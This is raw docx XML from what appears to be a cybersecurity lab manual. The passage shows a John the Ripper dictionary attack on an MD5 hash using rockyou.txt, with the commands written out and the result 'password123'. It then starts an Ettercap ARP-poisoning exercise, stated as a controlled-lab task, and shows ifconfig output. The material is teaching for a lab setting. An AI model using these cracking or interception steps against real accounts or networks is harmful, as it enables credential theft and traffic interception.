        <w:spacing w:before="240"/>
        <w:ind w:left="1888"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nano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hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027A5318" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="243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Paste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generated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hash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into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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1C555" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8C185B" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="6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Save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exit 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file (CTRL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+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ENTER, CTRL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+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X).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F4A06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3B806893" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00700285">
      <w:pPr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Prepare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Dictionary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File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48389709" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
          <w:tab w:val="left" w:pos="1888"/>
        </w:tabs>
        <w:spacing w:line="451" w:lineRule="auto"/>
        <w:ind w:right="5354" w:hanging="1080"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Navigate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0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wordlists</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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directory: ls /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07009F" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="273" w:lineRule="exact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If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rockyou.txt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compressed,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extract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it </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFB120" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="242"/>
        <w:ind w:left="188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gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AD88A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2EC1FDA7" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="169"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632CA923" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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Run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Dictionary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John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Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436189C4" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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Execute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 following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command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF0D2E" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="3" w:right="296"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>john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--format=raw-md5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--wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt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hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9638B" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="808"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>John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Ripper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hashes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each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word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from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rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECCB06E" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="808"/>
        </w:tabs>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It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compares each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hash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MD5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hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9912C6" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="808"/>
        </w:tabs>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If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match is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found, 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 is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cracked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54721337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3758044A" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="170"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A96685" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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Display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Cracked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Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCEDBC6" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="1168" w:right="3133" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>After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attack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completes,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display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recovered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using: john</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>--format=raw-md5 --show</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D22480" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="949"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276" w:lineRule="exact"/>
        <w:ind w:left="949" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observe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 cracked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plaintext </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF4028" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C39FCA" w14:textId="4D46D4B8" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00700285">
      <w:pPr>
        <w:spacing w:before="1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Observations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(Part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pacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD5EC1C" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15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Hash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algorithm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used: </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCFE54E" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Attack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type: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Dictionary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Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9CDA58" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tool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used: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John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Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7271494B" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dictionary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file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used: </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15AE97" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="242"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cracked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password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD67C98" w14:textId="2E8EA4CC" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00ED13DB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ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31769156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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB259F9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5132751B" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20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Linux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Analysis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ARP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Poisoning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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC15A6A" w14:textId="53F97C22" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00700285" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB67C83" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="448" w:right="527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perform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Linux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analysis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standard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networking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commands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conduct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an ARP poisoning attack in a controlled laboratory environment </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect and intercept network traffic and analyze its impact on network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C1F936" w14:textId="4A52899F" w:rsidR="00FE7AA2" w:rsidRPr="00700285" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Procedure</w:t>
      </w:r>
      <w:r w:rsidR="00700285">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B2B22" w14:textId="77777777" w:rsidR="00700285" w:rsidRDefault="00700285" w:rsidP="00700285">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E9C868" w14:textId="251C133F" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000" w:rsidP="00700285">
      <w:pPr>
        <w:spacing w:before="1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PART</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-18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Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="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Network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Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA0212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Display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Interface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Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE67A5" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="204"/>
        <w:ind w:left="2608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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B0B0F7E" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="24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25973601" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FF8627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60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Displays:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA4C13" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="243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interfaces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(eth0, wlan0,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lo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D560CC" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="232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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF6187" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="234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MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D55C8" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="232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Packet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statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950960D" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="235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Expected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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439933A2" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1247"/>
        </w:tabs>
        <w:spacing w:before="240" w:line="451" w:lineRule="auto"/>
        <w:ind w:left="1228" w:right="6172" w:hanging="780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eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encap:Ethernet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b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inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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addr:192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EAF8E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="448" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5059" w:firstLine="779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HWaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>08:00:27:aa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">:bb:cc </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Important Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3681D565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inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-3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addr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address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of Kali </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE4525E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HWaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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MAC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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38AF59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2"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eth0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Wired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interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ABC2F2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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lo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Loopback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interface </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062A10C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52C908BF" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="209"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
